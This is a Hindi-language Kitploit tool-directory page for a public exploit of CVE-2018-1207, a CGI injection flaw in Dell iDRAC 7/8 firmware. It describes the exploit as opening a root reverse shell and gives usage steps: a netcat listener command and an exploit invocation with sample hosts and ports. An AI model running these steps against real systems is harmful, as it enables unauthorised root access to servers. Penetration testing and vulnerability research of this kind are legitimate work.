Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2018-1207 — एक्सप्लॉइट iDRAC 7 & 8 फ़र्मवेयर < 2.52.52.52 | Kitploit
उपकरण/GitHubGitHub/mgargiullo/cve-2018-1207
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubmgargiullo/cve-2018-1207

cve-2018-1207

एक्सप्लॉइट iDRAC 7 & 8 फ़र्मवेयर < 2.52.52.52

रिपॉजिटरी देखें
18914 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2018-1207

शोषण iDRAC 7 & 8 फर्मवेयर < 2.52.52.52

विवरण

Dell EMC iDRAC7/iDRAC8, संस्करण 2.52.52.52 से पहले, CGI इंजेक्शन भेद्यता रखते हैं जिसका उपयोग दूरस्थ कोड निष्पादित करने के लिए किया जा सकता है। एक दूरस्थ अप्रमाणित हमलावर संभावित रूप से CGI चर का उपयोग करके दूरस्थ कोड निष्पादित करने में सक्षम हो सकता है।

यह कोड iDRAC सेवा को रूट उपयोगकर्ता के रूप में एक रिवर्स शेल खोलने का कारण बनना चाहिए।

उपयोग

अपना स्थानीय लिसनर प्रारंभ करें: nc -v -l -p local_port

nc -v -l -p 5500

शोषण चलाएँ: python ./cve-2018-1207.py remote_host remote_port local_host local_port

python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500

आवश्यकताएँ

आपको sh4-linux-gnu-gcc का एक संस्करण स्थापित करना होगा, जो वर्तमान में sh4-linux-gnu-gcc-11 है।

इसे apt install gcc-11-sh4-linux-gnu के साथ स्थापित कर सकते हैं।

टूल डाउनलोड करें